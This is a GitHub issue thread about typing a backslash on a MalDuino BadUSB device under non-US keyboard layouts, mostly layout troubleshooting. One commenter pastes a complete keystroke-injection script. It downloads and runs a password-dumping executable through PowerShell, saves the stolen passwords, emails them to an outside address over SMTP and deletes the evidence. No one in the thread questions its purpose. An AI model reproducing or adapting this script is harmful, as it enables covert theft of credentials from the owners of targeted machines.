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How to get BackSlash to work? (\) #13

Open Vikvek opened 6 years ago

Vikvek commented 6 years ago

I need to use backslash in windows applications but i just cant get it working, not with // or \ It just wont come out, all what i get is +

spacehuhn commented 6 years ago

That's keyboard layout problem. Maybe have a look at the other issues (open and closed). For some layouts the solution is to use ALT_RIGHT \.

Vikvek commented 6 years ago

ALTGR \ gives error on compiler.

I need to type this: STRING %userprofile%\Downloads\1dv8acg Can you give me example?

spacehuhn commented 6 years ago

Sorry my bad it's ALT_GR So for example:

STRING %userprofile% ALT_GR \ STRING Downloads ...

Not sure if that will work for you though. It did fix it for other people's layout problem.

Vikvek commented 6 years ago

Copy paste that to

ALT_GR is giving error, it doesnt exist (Covert to LITE)

spacehuhn commented 6 years ago

The Lite is different. The trick won't work there, atleast not with the converter. And sorry I meant ALT_RIGHT, ALT_GR should be implemented but isn't - gonna put it on the todo list.

So because this is a keyboard layout problem, check the repository for the language files we use:

GreenSales commented 6 years ago

BackSlash doesen't work for me either... This is the script i want to use: REM 1. Open CMD DELAY 3000 CONTROL ESCAPE DELAY 1000 STRING cmd DELAY 1000 ENTER DELAY 300 REM 2. Download tool (host it in your server) STRING powershell (New-Object System.Net.WebClient).DownloadFile('','%TEMP%\pass.exe'); ENTER REM (Customize your download time below) DELAY 5000 REM 3. Save the passwords STRING %TEMP%\pass.exe ENTER DELAY 3000 CTRL A CTRL S DELAY 400 STRING %TEMP%\pass.txt DELAY 200 ENTER DELAY 400 ALT F4 DELAY 300 REM 4. Send them via email STRING powershell ENTER DELAY 300 STRING $SMTPServer = '' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('', 'your_password'); ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = '' ENTER STRING $ReportEmail.To.Add('') ENTER STRING $ReportEmail.Subject = 'MalDuino Passwords for ' + $(hostname) ENTER STRING $ReportEmail.Body = 'Attached is your information file.' ENTER STRING $ReportEmail.Attachments.Add($env:temp + '\pass.txt') ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER DELAY 1000 STRING exit ENTER REM 5. Clean everything STRING del %TEMP%\pass.* ENTER DELAY 300 STRING exit ENTER

malduino stops writing near the download link at %TEMP% what should i do?

v3lip commented 3 years ago

I know this is old, so.. Hi Googlers with the same issue(?) Here's how I fixed it. (I live in Norway so I use the DK layout by defualt.)


By going into the US layout I can press the coresponding button to get backslash. If you use something else (DE etcetc) this will not work for you. But try a few random keys using the US layout. You can quickly switch between LOCALEs without problems with the example I gave above.


EDIT: I see now that the TS uses some sort of compiler that I am not familiar with. This fix is for the MalduinoW that has a function called LOCALE that I see the compiler does not have. But I hope I got your head on the right track.